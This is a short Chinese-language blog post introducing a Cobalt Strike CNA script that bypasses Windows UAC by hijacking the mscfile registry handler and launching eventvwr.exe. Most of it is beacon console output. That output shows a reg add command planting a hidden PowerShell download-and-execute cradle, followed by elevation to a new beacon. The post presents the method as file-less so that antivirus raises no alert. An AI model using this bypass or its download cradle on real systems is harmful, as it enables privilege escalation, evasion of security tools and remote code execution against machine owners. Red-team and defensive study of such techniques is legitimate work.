MENU

Eventvwr File-less UAC Bypass CNA

December 6, 2016 • Security

UAC-prompt-Windows-10.jpg

前言

Matt Nelson最近发布了一个非常有趣的文件,使用事件查看器Bypass UAC的Metasploit模块。在此之后,我们决定在Cobalt Strike 中以CNA脚本的形式实现。Cobalt Strike当前默认的UAC Bypass需要DLL劫持并需要将DLL写入磁盘中。如下所示:

beacon> bypassuac
[*] Tasked beacon to spawn windows/beacon_smb/bind_pipe (127.0.0.1:6667) in a high integrity process
[+] host called home, sent: 111759 bytes
[+] received output:
[*] Wrote hijack DLL to 'C:\Users\vysec\AppData\Local\Temp\0a80.dll'
[+] Privileged file copy success! C:\WINDOWS\System32\NTWDBLIB.dll
[+] C:\WINDOWS\System32\cliconfg.exe ran and exited.
[*] Cleanup successful

简介

Bypassuac-eventvwr作为一种易于使用eventvwr Bypass UAC的技术。这种方法不需要写入磁盘,因此安全防护软件也不会告警。

CNA脚本会执行以下操作:

  • 写入注册表路径劫持
  • 执行eventvwr.exe
  • eventvwr.exe执行时劫持
  • 针对中小企业使用新的beacon技术
  • 删除注册表路径劫持
  • 高级beacon技术

使用示例

beacon> bypassuac-eventvwr "smb"
[*] Tasked Beacon to BypassUAC to windows/beacon_smb/bind_pipe (127.0.0.1:6667) via Eventvwr Fileless UAC Bypass
[*] Adding Registry Key
[*] reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:8390/'))
[*] Tasked beacon to run: reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "cmd.exe /c powershell -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://127.0.0.1:8390/'))
[*] Spawning Eventvwr.exe
[*] Tasked beacon to run: eventvwr.exe
[+] host called home, sent: 3253 bytes
[*] Deleting Registry Key
[*] reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
[*] Tasked beacon to run: reg delete "HKCU\Software\Classes\mscfile\shell\open\command" /f
[+] received output:
The operation completed successfully.
[+] host called home, sent: 196761 bytes
[+] established link to child beacon: 192.168.114.134
[+] received output:
The operation completed successfully.

Bypassuac-eventvwr

https://github.com/mdsecresearch/Publications/blob/master/tools/redteam/cna/eventvwr.cna

Archives QR Code
QR Code for this page
Tipping QR Code